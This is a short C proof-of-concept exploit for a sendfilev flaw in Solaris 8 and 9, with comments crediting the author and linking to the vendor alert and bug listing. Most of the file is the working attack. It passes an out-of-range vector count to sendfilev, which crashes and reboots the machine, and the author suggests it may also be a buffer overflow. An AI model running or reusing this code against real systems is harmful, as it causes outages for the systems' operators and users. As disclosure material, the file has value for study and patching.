/*
 * Solaris 8/9 sendfilev PoC exploit code.
 *
 * Causes a DoS and the system will reboot.
 *
 * I'm not sure this just a DoS, because honestly
 * it smells somewhat like a buffer overflow.  If 
 * anyone figures out more, email me.
 *
 * Jon Hart <warchild@spoofed.org>
 *
 *   $CC -o solaris-sendfilev-exploit solaris-sendfilev-exploit.c -lsendfile
 *
 *   See:
 *
 *      http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57470
 *      http://securityfocus.com/bid/10202/
 *
 * I take no responsibility whatsoever for what you do
 * with this code.  Use at your own risk.
 */

#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char *argv[]) {
   ssize_t ret;
   size_t xfer;
   struct sendfilevec vec[1];
   int fd = open("/tmp/.sendfile", O_RDWR | O_CREAT | O_TRUNC, 0600);
   vec[0].sfv_fd = open("/etc/hosts", O_RDONLY);
   vec[0].sfv_flag = 0;
   vec[0].sfv_off = 0;
   vec[0].sfv_len = 0;

   /* This where the DoS happens.  Point it way too far into the vector,
   * which only has 1 entry in it.
   */
   ret = sendfilev(fd, vec, 100, &xfer);
}